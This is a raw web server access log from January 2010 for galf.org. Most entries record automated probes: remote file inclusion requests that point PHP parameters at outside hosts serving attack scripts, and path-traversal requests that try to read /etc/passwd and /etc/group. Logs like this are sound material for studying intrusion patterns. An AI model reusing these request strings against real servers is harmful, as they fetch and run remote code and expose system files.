79.170.45.126 - - [18/Jan/2010:01:30:06 -0800] "GET /arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:06 -0800] "GET /logs/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:10 -0800] "GET /logs/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:10 -0800] "GET /logs/access_090921.log/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:10 -0800] "GET /arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:15 -0800] "GET /logs/access_090921.log/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:15 -0800] "GET /logs/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:15 -0800] "GET /arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:20 -0800] "GET /arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:20 -0800] "GET /logs/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:20 -0800] "GET /logs/access_090921.log/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:30:37 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:31:20 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:32:03 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:33:15 -0800] "GET /logs/access_091214.log//?_zb_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:33:16 -0800] "GET /?_zb_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:33:16 -0800] "GET /logs//?_zb_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
79.182.184.29 - - [18/Jan/2010:01:33:29 -0800] "GET /logs/access_090629.log HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
79.182.184.29 - - [18/Jan/2010:01:33:30 -0800] "GET /logs/access_090629.log HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:37:07 -0800] "GET /logs/access_090907.log%20/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:37:08 -0800] "GET /logs/access_090907.log%20/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:37:31 -0800] "GET /logs/access_100111.log/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:37:31 -0800] "GET /errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:37:32 -0800] "GET /logs/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:39:45 -0800] "GET /logs/access_100111.log/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:39:45 -0800] "GET /errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:39:48 -0800] "GET /logs/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.195.37.161 - - [18/Jan/2010:01:40:57 -0800] "GET /logs/access_090810.log HTTP/1.0" 200 4806214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.101.70.1 - - [18/Jan/2010:01:42:25 -0800] "GET /logs/access.log/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.101.70.1 - - [18/Jan/2010:01:42:25 -0800] "GET /errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.101.70.1 - - [18/Jan/2010:01:42:26 -0800] "GET /logs/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
67.19.194.26 - - [18/Jan/2010:01:44:36 -0800] "GET /logs/access_090824.log//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:44:47 -0800] "GET /logs/access_090824.log//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:44:54 -0800] "GET /logs/access.log/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
71.6.189.153 - - [18/Jan/2010:01:44:54 -0800] "GET /errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
71.6.189.153 - - [18/Jan/2010:01:44:54 -0800] "GET /logs/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
189.31.228.47 - - [18/Jan/2010:01:45:17 -0800] "GET /logs/access_090803.log/default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
189.31.228.47 - - [18/Jan/2010:01:45:17 -0800] "GET /default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
189.31.228.47 - - [18/Jan/2010:01:45:18 -0800] "GET /logs/default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:09 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:09 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:09 -0800] "GET /logs/access_091012.log%20%20//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:09 -0800] "GET /logs/access_091214.log%20%20//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:26 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:26 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:26 -0800] "GET /logs/access_091012.log%20%20//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:48:26 -0800] "GET /logs/access_091214.log%20%20//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:49:25 -0800] "GET /logs/access_090907.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [18/Jan/2010:01:49:31 -0800] "GET /logs/access.log//appserv/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.101.70.1 - - [18/Jan/2010:01:49:32 -0800] "GET /appserv/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.101.70.1 - - [18/Jan/2010:01:49:32 -0800] "GET /logs//appserv/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:49:54 -0800] "GET /logs/access_090720.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:50:19 -0800] "GET /logs/access.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.36.2.101 - - [18/Jan/2010:01:50:19 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.36.2.101 - - [18/Jan/2010:01:50:20 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.36.2.101 - - [18/Jan/2010:01:50:23 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:50:23 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:50:23 -0800] "GET /logs/access_100111.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:52:25 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.36.2.101 - - [18/Jan/2010:01:52:25 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.36.2.101 - - [18/Jan/2010:01:52:25 -0800] "GET /logs/access.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.36.2.101 - - [18/Jan/2010:01:52:29 -0800] "GET /logs/access_100111.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:52:29 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:52:29 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:53:11 -0800] "GET /logs/access_090907.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:53:47 -0800] "GET /logs/access_090720.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:08 -0800] "GET /logs/access_091214.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:08 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:08 -0800] "GET /logs/access_091012.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:08 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:11 -0800] "GET /logs/access_091012.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:11 -0800] "GET /logs/access_091214.log//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:11 -0800] "GET /ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [18/Jan/2010:01:54:11 -0800] "GET /logs//ggambo7002_board/administrator/components//administrator/components/com_virtuemart/admin.virtuemart.php?mosConfig.absolute.path=http://nba-news.net//cache/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:54:44 -0800] "GET /logs/access_091214.log//?_zb_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:54:44 -0800] "GET /?_zb_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:54:44 -0800] "GET /logs//?_zb_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:58:02 -0800] "GET /logs/access_091123.log/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:58:02 -0800] "GET /news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:58:02 -0800] "GET /logs/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:58:02 -0800] "GET /logs/access_091123.log/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:58:02 -0800] "GET /news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:58:02 -0800] "GET /logs/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:58:55 -0800] "GET /logs/access_091214.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:58:55 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:58:55 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:59:02 -0800] "GET /logs/access_091116.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:59:18 -0800] "GET /logs/access.log//appserv/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:59:18 -0800] "GET /appserv/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:01:59:18 -0800] "GET /logs//appserv/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:59:44 -0800] "GET /logs/access_091214.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:59:44 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:01:59:45 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:59:50 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:02:00:01 -0800] "GET /logs/access_091116.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:00:02 -0800] "GET /logs/access_090629.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:00:40 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:00:59 -0800] "GET /logs/access_090629.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.31.228.47 - - [18/Jan/2010:02:01:11 -0800] "GET /logs/access_090720.log/default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:02:04:10 -0800] "GET /logs/access_091012.log/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:02:04:10 -0800] "GET /logs/access_091012.log/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:12 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:12 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:13 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [18/Jan/2010:02:05:14 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.carex.co.kr/data/rs/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
210.205.6.130 - - [18/Jan/2010:02:05:14 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.carex.co.kr/data/rs/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:17 -0800] "GET /logs/access_090921.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:20 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:20 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:20 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:21 -0800] "GET /logs/access_091221.log///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:22 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:22 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:22 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:23 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:23 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:23 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:31 -0800] "GET /logs/access_090629.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:31 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:31 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:33 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:33 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
